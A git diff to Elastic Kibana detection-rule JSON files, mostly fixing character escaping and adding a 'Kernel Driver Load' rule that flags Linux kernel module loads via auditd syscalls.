a/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3b47900d-e793-49e8-968f-c90dc3526aa1_108.json @@ -54,7 +54,7 @@ ], "risk_score": 47, "rule_id": "3b47900d-e793-49e8-968f-c90dc3526aa1", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "medium", "tags": [ "Domain: Endpoint", @@ -66,7 +66,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json index 847d119d418..740b385c2fc 100644 --- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_104.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Elastic", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json index c5170ada8d8..0b513fbd964 100644 --- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_105.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json index bd01dce091d..1b9872e4bf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_106.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json index c6ab3fe1d7f..7ef88a41cf9 100644 --- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_107.json @@ -57,7 +57,7 @@ ], "risk_score": 73, "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", - "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", + "setup": "If enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2, events will not define `event.ingested` and default fallback for EQL rules was not added until 8.2, so you will need to add a custom pipeline to populate `event.ingested` to @timestamp for this rule to work.", "severity": "high", "tags": [ "Domain: Endpoint", @@ -69,7 +69,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json index db5480b11f0..70b6772deb8 100644 --- a/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json +++ b/packages/security_detection_engine/kibana/security_rule/3bc6deaa-fbd4-433a-ae21-3e892f95624f_108.json @@ -56,7 +56,7 @@ ], "risk_score": 73, "rule_id": "3bc6deaa-fbd4-433a-ae21-3e892f95624f", - "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions \u003c8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", + "setup": "\nIf enabling an EQL rule on a non-elastic-agent index (such as beats) for versions <8.2,\nevents will not define `event.ingested` and default fallback for EQL rules was not added until version 8.2.\nHence for this rule to work effectively, users will need to add a custom ingest pipeline to populate\n`event.ingested` to @timestamp.\nFor more details on adding a custom ingest pipeline refer - https://www.elastic.co/guide/en/fleet/current/data-streams-pipeline-tutorial.html\n", "severity": "high", "tags": [ "Domain: Endpoint", @@ -68,7 +68,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0006", "name": "Credential Access", diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json index 5caca57d936..16bc77b8010 100644 --- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_1.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json index d39a7eeea9a..0c058bfb7fb 100644 --- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_2.json @@ -50,7 +50,7 @@ ], "risk_score": 21, "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```", "severity": "low", "tags": [ "Domain: Endpoint", @@ -62,7 +62,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -84,7 +84,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json index 86305978eab..819ea006476 100644 --- a/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3d3aa8f9-12af-441f-9344-9f31053e316d_3.json @@ -49,7 +49,7 @@ ], "risk_score": 21, "rule_id": "3d3aa8f9-12af-441f-9344-9f31053e316d", - "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration \u003e\nAdministrative Templates \u003e\nWindows PowerShell \u003e\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", + "setup": "The 'PowerShell Script Block Logging' logging policy must be enabled.\nSteps to implement the logging policy with Advanced Audit Configuration:\n\n```\nComputer Configuration >\nAdministrative Templates >\nWindows PowerShell >\nTurn on PowerShell Script Block Logging (Enable)\n```\n\nSteps to implement the logging policy via registry:\n\n```\nreg add \"hklm\\SOFTWARE\\Policies\\Microsoft\\Windows\\PowerShell\\ScriptBlockLogging\" /v EnableScriptBlockLogging /t REG_DWORD /d 1\n```\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -61,7 +61,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -83,7 +83,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json index 86bdce9fd62..d6ed7605192 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_105.json @@ -67,7 +67,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -89,7 +89,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json index f134f0586c6..70d8c7ffd5f 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json +++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_106.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json index 776e707fa55..aaecc9d6336 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json +++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_107.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json index 29e3b14c05c..70c51cf73b3 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json +++ b/packages/security_detection_engine/kibana/security_rule/3e002465-876f-4f04-b016-84ef48ce7e5d_208.json @@ -65,7 +65,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0040", "name": "Impact", @@ -87,7 +87,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0009", "name": "Collection", diff --git a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json index 24598500299..8e61280fc80 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3e0561b5-3fac-4461-84cc-19163b9aaa61_1.json @@ -33,7 +33,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0008", "name": "Lateral Movement", diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json index 07eb2cd8c46..451adc1168e 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json +++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_2.json @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json index 0d6384fbd12..a7a4be2f54a 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json +++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_3.json @@ -95,7 +95,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -110,7 +110,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json index e64290bf866..3b83d797097 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json +++ b/packages/security_detection_engine/kibana/security_rule/3e0eeb75-16e8-4f2f-9826-62461ca128b7_4.json @@ -96,7 +96,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", @@ -111,7 +111,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0002", "name": "Execution", diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json index f340afacb4b..ba232aee63b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_1.json @@ -45,7 +45,7 @@ ], "risk_score": 21, "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", - "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana --\u003e\nManagement --\u003e\nIntegrations --\u003e\nAuditd Manager --\u003e\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", "severity": "low", "tags": [ "Domain: Endpoint", @@ -57,7 +57,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", @@ -79,7 +79,7 @@ ] }, { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0005", "name": "Defense Evasion", diff --git a/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json new file mode 100644 index 00000000000..cb1b11b98f7 --- /dev/null +++ b/packages/security_detection_engine/kibana/security_rule/3e12a439-d002-4944-bc42-171c0dcb9b96_2.json @@ -0,0 +1,103 @@ +{ + "attributes": { + "author": [ + "Elastic" + ], + "building_block_type": "default", + "description": "Detects the loading of a Linux kernel module through system calls. Threat actors may leverage Linux kernel modules to load a rootkit on a system providing them with complete control and the ability to hide from security products. As other rules monitor for the addition of Linux kernel modules through system utilities or .ko files, this rule covers the gap that evasive rootkits leverage by monitoring for kernel module additions on the lowest level through auditd_manager.", + "from": "now-9m", + "index": [ + "auditbeat-*", + "logs-auditd_manager.auditd-*" + ], + "language": "eql", + "license": "Elastic License v2", + "name": "Kernel Driver Load", + "query": "driver where host.os.type == \"linux\" and event.dataset == \"auditd_manager.auditd\" and \nevent.action == \"loaded-kernel-module\" and auditd.data.syscall in (\"init_module\", \"finit_module\")\n", + "related_integrations": [ + { + "integration": "auditd", + "package": "auditd_manager", + "version": "^1.0.0" + } + ], + "required_fields": [ + { + "ecs": false, + "name": "auditd.data.syscall", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.action", + "type": "keyword" + }, + { + "ecs": true, + "name": "event.dataset", + "type": "keyword" + }, + { + "ecs": true, + "name": "host.os.type", + "type": "keyword" + } + ], + "risk_score": 21, + "rule_id": "3e12a439-d002-4944-bc42-171c0dcb9b96", + "setup": "## Setup\nThis rule requires the use of the `auditd_manager` integration. `Auditd_manager` is a tool designed to simplify and enhance the management of the audit subsystem in Linux systems. It provides a user-friendly interface and automation capabilities for configuring and monitoring system auditing through the auditd daemon. With `auditd_manager`, administrators can easily define audit rules, track system events, and generate comprehensive audit reports, improving overall security and compliance in the system. The following steps should be executed in order to install and deploy `auditd_manager` on a Linux system. \n\n```\nKibana -->\nManagement -->\nIntegrations -->\nAuditd Manager -->\nAdd Auditd Manager\n```\n\n`Auditd_manager` subscribes to the kernel and receives events as they occur without any additional configuration. However, if more advanced configuration is required to detect specific behavior, audit rules can be added to the integration in either the \"audit rules\" configuration box or the \"auditd rule files\" box by specifying a file to read the audit rules from. \n\nFor this detection rule to trigger, the following additional audit rules are required to be added to the integration:\n```\n-a always,exit -F arch=b64 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n-a always,exit -F arch=b32 -S finit_module -S init_module -S delete_module -F auid!=-1 -k modules\n```\n\nAdd the newly installed `auditd manager` to an agent policy, and deploy the agent on a Linux system from which auditd log files are desirable.\n", + "severity": "low", + "tags": [ + "Domain: Endpoint", + "OS: Linux", + "Use Case: Threat Detection", + "Tactic: Persistence", + "Tactic: Defense Evasion", + "Rule Type: BBR" + ], + "threat": [ + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0003", + "name": "Persistence", + "reference": "https://attack.mitre.org/tactics/TA0003/" + }, + "technique": [ + { + "id": "T1547", + "name": "Boot or Logon Autostart Execution", + "reference": "https://attack.mitre.org/techniques/T1547/", + "subtechnique": [ + { + "id": "T1547.006", + "name": "Kernel Modules and Extensions", + "reference": "https://attack.mitre.org/techniques/T1547/006/" + } + ] + } + ] + }, + { + "framework": "MITRE ATT&CK", + "tactic": { + "id": "TA0005", + "name": "Defense Evasion", + "reference": "https://attack.mitre.org/tactics/TA0005/" + }, + "technique": [ + { + "id": "T1014", + "name": "Rootkit", + "reference": "https://attack.mitre.org/techniques/T1014/" + } + ] + } + ], + "timestamp_override": "event.ingested", + "type": "eql", + "version": 2 + }, + "id": "3e12a439-d002-4944-bc42-171c0dcb9b96_2", + "type": "security-rule" +} \ No newline at end of file diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json index d1cc6bc90e8..a065cc1b431 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_102.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json index 9ef15f4d099..a6d998d4d64 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_103.json @@ -54,7 +54,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json index 0538c336e17..b274a11ef80 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_104.json @@ -55,7 +55,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json index ef00bfb9cda..88930c0d8fe 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json +++ b/packages/security_detection_engine/kibana/security_rule/3e3d15c6-1509-479a-b125-21718372157e_105.json @@ -56,7 +56,7 @@ ], "threat": [ { - "framework": "MITRE ATT\u0026CK", + "framework": "MITRE ATT&CK", "tactic": { "id": "TA0003", "name": "Persistence", diff --git a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json b/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json index 31120a8f7c4..1653576d65b 100644 --- a/packages/security_detection_engine/kibana/security_rule/3e441bdb-596c-44fd-8628-2cfdf4516ada_1.json +++ 